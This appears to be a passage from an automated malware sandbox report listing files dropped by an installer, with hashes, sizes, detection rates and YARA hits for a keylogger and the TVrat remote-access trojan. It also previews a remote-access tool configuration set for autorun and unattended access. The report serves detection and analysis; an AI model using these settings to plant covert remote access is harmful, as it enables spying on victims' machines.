                                                                                                                                SSDEEP:12288:RPCS0cSUktNimb/JZqNFcbJ3bZJNlvI8CjBMUC6eVc4/SK:RPCS0c1ktNimbqYZJNlvVc4L
                                                                                                                                MD5:96D413CAAF8C7793A96EF200F6695922
                                                                                                                                SHA1:ABFB19A5BEA8724A08A3C709B68C65178E8EFBE5
                                                                                                                                SHA-256:5C6E5346C4EF80E1DD211BD5519311ACA01025CE1D3811113A03E657938F370D
                                                                                                                                SHA-512:93BF7AC89AE64948C3E91294DE89478B0F92D9CEFB71C803ABB324E181D783801C87DD6D806B0DB0D3737B3330E37993AE07B9B7D5AACCA9F9F5C3556E23EEE4
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2236144
                                                                                                                                Entropy (8bit):5.624149670958732
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24576:2HGHuX4EewGQcPryfFMoxJ+4PulW/ChEIgTS/zRUm:2HGOX4CGQtMs+WuVge/em
                                                                                                                                MD5:BCCF6A5C2595EEA84533692BB788D8BB
                                                                                                                                SHA1:24318226F145E52B7633A4E9E844D6EAD43B75AC
                                                                                                                                SHA-256:ABF75DE674428E112F90F1C618218FF73EF851F4F09C5F5BA8B69E79A6C74DBF
                                                                                                                                SHA-512:78F24F0812AAE31E83340ADEB1A1AE8C00EDFDF483E299706F863CB713BFDC2501B5418CE8F8BD9131E3C704BFFB58A8CA05C5E0A75EB19F15E0409C5B74E35B
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):970912
                                                                                                                                Entropy (8bit):6.9649735952029515
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:LBmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJQV:dmFyjLF847eiWWcoGZVOIxh/WxIAIbGV
                                                                                                                                MD5:034CCADC1C073E4216E9466B720F9849
                                                                                                                                SHA1:F19E9D8317161EDC7D3E963CC0FC46BD5E4A55A1
                                                                                                                                SHA-256:86E39B5995AF0E042FCDAA85FE2AEFD7C9DDC7AD65E6327BD5E7058BC3AB615F
                                                                                                                                SHA-512:5F11EF92D936669EE834A5CEF5C7D0E7703BF05D03DC4F09B9DCFE048D7D5ADFAAB6A9C7F42E8080A5E9AAD44A35F39F3940D5CCA20623D9CAFE373C635570F7
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):581304
                                                                                                                                Entropy (8bit):6.580382227041057
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:bj4Q3+oAscridrDg76u3HsBTc9GtIGPi2Emvh5/kJSMl0yomcY/nRwl2Sp:bHYXSTMGtNPitm1yomJ/n+tp
                                                                                                                                MD5:CDC5A8221738C1CA66564755BB58138C
                                                                                                                                SHA1:EF096A2CAF133D217C202C147855F2CEE7ECD105
                                                                                                                                SHA-256:DF5CEF85E92C6FFFAAC0ACDCE645AED3C5FA1F8FE7F9700D84CA08468AD3D5E3
                                                                                                                                SHA-512:A9F3E256518771C1C97374E7AE3EE19EBEC0D794CD740E059DBC8289356CF1FB5D4A19F2677DB2ADBB179A73520AAEC67947DCF4C8BCD930206DE4B6CDCAD4C6
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):586
                                                                                                                                Entropy (8bit):5.203397968860563
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:L1YWzRcSbZKsNlTQ/dw/7y/x5/D++472p+fso+9hffAaJYQMhsK/qI8qP:Z7zRcSbZKKlcMypJD5KxkiaJosBq
                                                                                                                                MD5:5D7974984AE3D593B7887CC7BDA866DD
                                                                                                                                SHA1:9C0B2EC2659812F1E46F2D32F82E61DF223C674C
                                                                                                                                SHA-256:7888BDB632F1BC5EB6DAE5624FE9065868D279E50ACC569D3DDE0F6DB1C95051
                                                                                                                                SHA-512:7BDACFBCE85726A683C3A316F578A88D5991E37C8FB1E13FC4715141F5752E7FD5D145AC36730B637E26FD3198EDE2D27E86F5CF7283A0C9B08579B1056B0B70
                                                                                                                                Malicious:false
                                                                                                                                Preview:[config]..Security.FixPass=4297F44B13955235245B2497399D7A93..Main.Autorun=1..Main.CloseButtonOperation=0..Main.CheckUpdates=0..Security.UseLocalSecuritySettings=1..Security.DynPassKind=0..Security.PassLifetime=0..Security.CanWinAuth=1..Security.AccessKind=1..Security.CanWinLoginAnotherUser=1..Security.UNCONTROLLED_ACCESS=1..Security.CanWinLoginNotAdmin=1..Security.DenyRemoteSettingsControl=0..Security.DenyLockControls=0..Log.ServerStoreTechLog=0..Main.AWAYMODE_REQUIRED=1..Main.LogsLifetime=1..Main.LogsForMail2Support=1..ProxySettings.UseKind=1..ProxySettings.StoreUserAndPassw=1..
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):7543992
                                                                                                                                Entropy (8bit):6.717610928993395
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:98304:q0f/bCIDcCkgVmZqIXrdoXj++CEKDFBaVOGizeKFUtqiAp+hRWmMLlJ7p1:X/bCIPkgVpycKDFqOLNUtqiAz
                                                                                                                                MD5:8002D9E5851728EB024B398CF19DE390
                                                                                                                                SHA1:9A1DC7134F3F6FCCB37DFC4DDDA35DFA2875095E
                                                                                                                                SHA-256:B8DDE42C70D8C4A3511D5EDFFBC9F7F0C03DBDA980E29693E71344F76DA6BB0F
                                                                                                                                SHA-512:6936B6B01F9FC2F2F69DE6AE468A9F7173239BD003AD8B7BC7336C4DD4DB50457E20EC6783B2E8A166D684A56F3F1E9FB701CA903DF3F74E3CA25C46B8A8D00E
                                                                                                                                Malicious:true
                                                                                                                                Yara Hits:
                                                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\mo6x\is-ERH6U.tmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\mo6x\is-ERH6U.tmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_TVrat, Description: Yara detected TVrat, Source: C:\Users\user\AppData\Local\Temp\mo6x\is-ERH6U.tmp, Author: Joe Security
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):546816
                                                                                                                                Entropy (8bit):6.657309146326691
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:DEnhioDz6zv6pmEmE5A8K8ZOO2rKQrbdCPAEI:Dmbz+vomEBHbZO2YCBI
                                                                                                                                MD5:13CD45DF8AAA584EBD2A40EDE76F1E06
                                                                                                                                SHA1:BAA19E6A965621CB315E5F866EDC179EF1D6B863
                                                                                                                                SHA-256:3FF4E80E327F298A11E116A517BE0963A0B3CD376A6A624CAFFACD586E6B1449
                                                                                                                                SHA-512:285D7265AC05CECDD43650E5DEF9198B5F2F4D63665739BAA059598E41F4CE892248D3CA7E793AC274DC05B4C19CFA11C17FAEA62FC1E3495C94A03851049328
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1388688
                                                                                                                                Entropy (8bit):6.85745413435775
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24576:vNaU+KpPikndiNfzN4jH3PlMQzMjYpOtJqTp/kqg1+:xlUfzN4jH3PlyjYpOLqd/kP1+
                                                                                                                                MD5:3B838DC25E96877A1852966F75A5C44A
                                                                                                                                SHA1:555E1830829B008D66FF591D87AC235F6286AB9A
                                                                                                                                SHA-256:292C9367E5F978D2085192B85BCFEA7DF3A033172703BCCF1FF28A74D65D5AC1
                                                                                                                                SHA-512:B5A7F05CD721FC75B77BB33528F746E865C2277A32F3AA312A974DE903A817B7C83E7698980A496B5D04595B21926E94CF9F70A15CD0882D57BA25014BA775D6
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1074302464
                                                                                                                                Entropy (8bit):0.0076066072746656796
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:
                                                                                                                                MD5:F9EE295F34E22150DB8EDD2392482148
                                                                                                                                SHA1:60B9700E56D3D79FB0B2DA7DE1E3B964AC4522A4
                                                                                                                                SHA-256:5040D2F22275B4C59FA1D282440B228CA1327A66D5A82A9C6D313271EBAEE91E
                                                                                                                                SHA-512:E8FFDF207E8FC62543D9FE51423053F4F762CFC9C5106A422E1A3F30D96478AEC34C9CE7E381DE2FBA3B0745D1A4723EDEC626528E8EB4C5898D58E764F674AA
                                                                                                                                Malicious:true
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):17648
                                                                                                                                Entropy (8bit):6.317642988990049
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:ZPkFNiOMTd1th9gQIim+4vBDVU376TFNiWC:iNhMpXgIr4vBBYANi1
                                                                                                                                MD5:ACF7048E2347CFD66CD17648DBFBAF45
                                                                                                                                SHA1:DF5A12E399176771DC8CF2F7D0CF5548E41E2BB3
                                                                                                                                SHA-256:F1CFFBC2ADA8491755C76360AAD14314DEB576AA65F503E52FA24DEE7D33D8E7
                                                                                                                                SHA-512:51A53CB700FBB7ABF3BDA3101ED0885572460C1686D07C3D2125C8AA6F0834E30528BEE78CC40EE9270714A16AC769D16F5A916F37F0E48BBF7121202E58E0C0
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2533560
                                                                                                                                Entropy (8bit):6.236092740507617
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:49152:y+PXMbxU8+hh5Mitv70n8yT1CPwDv3uFfJEkyD9:y+PwEMit0n8A1CPwDv3uFfJC
                                                                                                                                MD5:59A3B581020759D52538425A1F5A53D5
                                                                                                                                SHA1:4E7C528EFEF2C42119C80EFE0AA994B7AA6D2AB6
                                                                                                                                SHA-256:4C94F00150231420A0526E9949AC9F339EB04B16BC18CB8A11C7FD98DB1235D6
                                                                                                                                SHA-512:9D30D8167E787FD4A82444BAAA3703920EC41CBE9C684010B63564DE04E00D590C8081006C68627B8297D2715194D4B80C23B959E554D42B2770664D1ED1B79E
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):541880
                                                                                                                                Entropy (8bit):5.766958615909
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:ghUZvMdmP9OwMJvP2jkIgEIdwKADpiw7FCPU2lvzTNl:BhMsPG2udwLdigFyU2lvzTNl
                                                                                                                                MD5:753B75570811052953F336261E3031BB
                                                                                                                                SHA1:2244CCE49368180C1CF6BCA0C57DAEC71401C4F7
                                                                                                                                SHA-256:603C5FD4E29C14DF02937DF765BF76E067A7A4706130D93F947106D0AE09A9DE
                                                                                                                                SHA-512:6C81B813A79077E7157CF7F647A1F3C31A71098037C7003BC40B70E4AADAFCF490FDC01C71A26F8FED8C97BA33B41DF5B8A0D479DA951459CBD56421705813C5
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2098416
                                                                                                                                Entropy (8bit):6.277915381502377
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:49152:Vkv4EyvQ/qpyr0kAYdQqqW6qvHewDe01CPwDv3uFR0b5YrpsJ:VkvXyvQ/qpyr0kAd66oewv1CPwDv3uFI
                                                                                                                                MD5:1AFC9BD5E625E85B696141F62FBA4325
                                                                                                                                SHA1:56FB325125F436D7408808446D58AF50F8AA3BFC
                                                                                                                                SHA-256:83A1E3CBE242B978B9F55273B7B2648D0492B741FF561C0EC1C6AD9A4AEDAB47
                                                                                                                                SHA-512:02C2CF9DBC319C2AAF324175CFD3E435824439F33B4CA697324F1B8FF4331D7BDE80DE46909FC629193EF02DEB40853E295B35DC2E3B094D116B5DD783919213
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2533560
                                                                                                                                Entropy (8bit):6.236092740507617
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:49152:y+PXMbxU8+hh5Mitv70n8yT1CPwDv3uFfJEkyD9:y+PwEMit0n8A1CPwDv3uFfJC
                                                                                                                                MD5:59A3B581020759D52538425A1F5A53D5
                                                                                                                                SHA1:4E7C528EFEF2C42119C80EFE0AA994B7AA6D2AB6
                                                                                                                                SHA-256:4C94F00150231420A0526E9949AC9F339EB04B16BC18CB8A11C7FD98DB1235D6
                                                                                                                                SHA-512:9D30D8167E787FD4A82444BAAA3703920EC41CBE9C684010B63564DE04E00D590C8081006C68627B8297D2715194D4B80C23B959E554D42B2770664D1ED1B79E
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2098416
                                                                                                                                Entropy (8bit):6.277915381502377
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:49152:Vkv4EyvQ/qpyr0kAYdQqqW6qvHewDe01CPwDv3uFR0b5YrpsJ:VkvXyvQ/qpyr0kAd66oewv1CPwDv3uFI
                                                                                                                                MD5:1AFC9BD5E625E85B696141F62FBA4325
                                                                                                                                SHA1:56FB325125F436D7408808446D58AF50F8AA3BFC
                                                                                                                                SHA-256:83A1E3CBE242B978B9F55273B7B2648D0492B741FF561C0EC1C6AD9A4AEDAB47
                                                                                                                                SHA-512:02C2CF9DBC319C2AAF324175CFD3E435824439F33B4CA697324F1B8FF4331D7BDE80DE46909FC629193EF02DEB40853E295B35DC2E3B094D116B5DD783919213
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):546816
                                                                                                                                Entropy (8bit):6.657309146326691
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:DEnhioDz6zv6pmEmE5A8K8ZOO2rKQrbdCPAEI:Dmbz+vomEBHbZO2YCBI
                                                                                                                                MD5:13CD45DF8AAA584EBD2A40EDE76F1E06
                                                                                                                                SHA1:BAA19E6A965621CB315E5F866EDC179EF1D6B863
                                                                                                                                SHA-256:3FF4E80E327F298A11E116A517BE0963A0B3CD376A6A624CAFFACD586E6B1449
                                                                                                                                SHA-512:285D7265AC05CECDD43650E5DEF9198B5F2F4D63665739BAA059598E41F4CE892248D3CA7E793AC274DC05B4C19CFA11C17FAEA62FC1E3495C94A03851049328
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1388688
                                                                                                                                Entropy (8bit):6.85745413435775
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24576:vNaU+KpPikndiNfzN4jH3PlMQzMjYpOtJqTp/kqg1+:xlUfzN4jH3PlyjYpOLqd/kP1+
                                                                                                                                MD5:3B838DC25E96877A1852966F75A5C44A
                                                                                                                                SHA1:555E1830829B008D66FF591D87AC235F6286AB9A
                                                                                                                                SHA-256:292C9367E5F978D2085192B85BCFEA7DF3A033172703BCCF1FF28A74D65D5AC1
                                                                                                                                SHA-512:B5A7F05CD721FC75B77BB33528F746E865C2277A32F3AA312A974DE903A817B7C83E7698980A496B5D04595B21926E94CF9F70A15CD0882D57BA25014BA775D6
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):713456
                                                                                                                                Entropy (8bit):6.620067101616198
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:RPCS0cSUktNimb/JZqNFcbJ3bZJNlvI8CjBMUC6eVc4/SK:RPCS0c1ktNimbqYZJNlvVc4L
                                                                                                                                MD5:96D413CAAF8C7793A96EF200F6695922
                                                                                                                                SHA1:ABFB19A5BEA8724A08A3C709B68C65178E8EFBE5
                                                                                                                                SHA-256:5C6E5346C4EF80E1DD211BD5519311ACA01025CE1D3811113A03E657938F370D
                                                                                                                                SHA-512:93BF7AC89AE64948C3E91294DE89478B0F92D9CEFB71C803ABB324E181D783801C87DD6D806B0DB0D3737B3330E37993AE07B9B7D5AACCA9F9F5C3556E23EEE4
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):541880
                                                                                                                                Entropy (8bit):5.766958615909
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:ghUZvMdmP9OwMJvP2jkIgEIdwKADpiw7FCPU2lvzTNl:BhMsPG2udwLdigFyU2lvzTNl
                                                                                                                                MD5:753B75570811052953F336261E3031BB
                                                                                                                                SHA1:2244CCE49368180C1CF6BCA0C57DAEC71401C4F7
                                                                                                                                SHA-256:603C5FD4E29C14DF02937DF765BF76E067A7A4706130D93F947106D0AE09A9DE
                                                                                                                                SHA-512:6C81B813A79077E7157CF7F647A1F3C31A71098037C7003BC40B70E4AADAFCF490FDC01C71A26F8FED8C97BA33B41DF5B8A0D479DA951459CBD56421705813C5
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 168x299, components 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):8097
                                                                                                                                Entropy (8bit):7.94099711365173
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:E9NXj7fQ9/RRN0AinryQKGgjkrEQtxH1AYZ18r:E9NzjGkOujEQ3H1V8r
                                                                                                                                MD5:2302BC48A162783A6A41C278B3F54145
                                                                                                                                SHA1:8C3272769F604DC3AE6C6B98A29CC779532D1783
                                                                                                                                SHA-256:1E5F58772571897E96CCA5ACB597DF65F8775E64D7031D6B2CCDBF22D5181F51
                                                                                                                                SHA-512:465086DFF63176A864C0BC26BCCFA1FBBA0503F9AFD78A86C863C266469F54069D00BBB718440090A065EA92AD0DD42A67B6A6C99ED6B2378F6A721984A806A6
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):970912
                                                                                                                                Entropy (8bit):6.9649735952029515
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:LBmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJQV:dmFyjLF847eiWWcoGZVOIxh/WxIAIbGV
                                                                                                                                MD5:034CCADC1C073E4216E9466B720F9849
                                                                                                                                SHA1:F19E9D8317161EDC7D3E963CC0FC46BD5E4A55A1
                                                                                                                                SHA-256:86E39B5995AF0E042FCDAA85FE2AEFD7C9DDC7AD65E6327BD5E7058BC3AB615F
                                                                                                                                SHA-512:5F11EF92D936669EE834A5CEF5C7D0E7703BF05D03DC4F09B9DCFE048D7D5ADFAAB6A9C7F42E8080A5E9AAD44A35F39F3940D5CCA20623D9CAFE373C635570F7
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):370488
                                                                                                                                Entropy (8bit):6.86993159214619
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6144:wJ9LiOhPhz85popbbFb06wAQAwq961b/v9MkvCq2/JO+UxK6DvX0C7Uxm//f0Ps7:IBi8q5po9JkyICq2/z6DvsyEE5+PgAEX
                                                                                                                                MD5:82E49683F540F78B2D1759CDE594482F
                                                                                                                                SHA1:352DCBDBBB3C5C927B83389E2AB7F40B66EE716A
                                                                                                                                SHA-256:55D99ECD7F821A4B2FE7E5A0B2CEA213DC79004C1DC413BD003F032C61080576
                                                                                                                                SHA-512:F50A3BCD5905103EEC344D7DAF1C17896DF9039D3E8D5E9BBD771F1E235EC6045D626ED838C9BF3A8F7A66AA5F41F0743EA7D9BDEF7492DA8B36561089E126BF
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1074302464
                                                                                                                                Entropy (8bit):0.0076066072746656796
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:
                                                                                                                                MD5:F9EE295F34E22150DB8EDD2392482148
                                                                                                                                SHA1:60B9700E56D3D79FB0B2DA7DE1E3B964AC4522A4
                                                                                                                                SHA-256:5040D2F22275B4C59FA1D282440B228CA1327A66D5A82A9C6D313271EBAEE91E
                                                                                                                                SHA-512:E8FFDF207E8FC62543D9FE51423053F4F762CFC9C5106A422E1A3F30D96478AEC34C9CE7E381DE2FBA3B0745D1A4723EDEC626528E8EB4C5898D58E764F674AA
                                                                                                                                Malicious:true
                                                                                                                                Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):33
                                                                                                                                Entropy (8bit):4.9837880587523955
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:SqUEDm:Sqnm
                                                                                                                                MD5:71B4245ABD801E82ECC8CB1571F8F52E
                                                                                                                                SHA1:CD8ADA2E8089936C031937232E09E385FB402DDC
                                                                                                                                SHA-256:4BE589771AC3BE4AE5B94590AFC39AEA664FBF400C651FBD268B48436FA509A7
                                                                                                                                SHA-512:6897B6B819850489BF9732C46EDAFBDC8E439F3482E120A693D79FDBCB5F2E6947E7E2065D9A684F0A7CEF1B25E0938476D9F819F9F661A0D7AD2A7D0E8789D9
                                                                                                                                Malicious:false
                                                                                                                                Preview:..8..DXP+...1.GBY.*..E.JQB......
                                                                                                                                Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):172216
                                                                                                                                Entropy (8bit):6.698242571688099
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3072:nGhQI/PxvCWRDvcDfo0F5HekeyO54ECV0/sMHL0WPCCb5rAg0Fujx8E0/3xt9qKv:kPxqWYF5HkyDLMsOzrAOL23VqK28j
                                                                                                                                MD5:CF1169A87FE6266C7B457A2424DA69DA
                                                                                                                                SHA1:5ADD67DEFD4CA56C1E9C0B239899EA699B140B64
                                                                                                                                SHA-256:24E01FD95225E260CDD41015A70374A048568D4DF6681B3D44EAABCB1EA03EAF
                                                                                                                                SHA-512:7BF76EB5B4E31A65931AF730909FBF848334BC98DA279E291E186FCAFDC81C76D1EF0EFEC4E00B8EAEDE6F8D130DA8B6B3D3C5DD8C14C6DCD3BCDC7D050A4B66
                                                                                                                                Malicious:true
                                                                                                                                Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):7543992
                                                                                                                                Entropy (8bit):6.717610928993395
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:98304:q0f/bCIDcCkgVmZqIXrdoXj++CEKDFBaVOGizeKFUtqiAp+hRWmMLlJ7p1:X/bCIPkgVpycKDFqOLNUtqiAz
                                                                                                                                MD5:8002D9E5851728EB024B398CF19DE390
                                                                                                                                SHA1:9A1DC7134F3F6FCCB37DFC4DDDA35DFA2875095E
                                                                                                                                SHA-256:B8DDE42C70D8C4A3511D5EDFFBC9F7F0C03DBDA980E29693E71344F76DA6BB0F
                                                                                                                                SHA-512:6936B6B01F9FC2F2F69DE6AE468A9F7173239BD003AD8B7BC7336C4DD4DB50457E20EC6783B2E8A166D684A56F3F1E9FB701CA903DF3F74E3CA25C46B8A8D00E
                                                                                                                                Malicious:true
                                                                                                                                Yara Hits:
                                                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\im\ast.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\im\ast.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_TVrat, Description: Yara detected TVrat, Source: C:\Users\user\AppData\Roaming\im\ast.exe, Author: Joe Security
                                                                                                                                Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):581304
                                                                                                                                Entropy (8bit):6.580382227041057
                                                                                                                                Encrypted:false
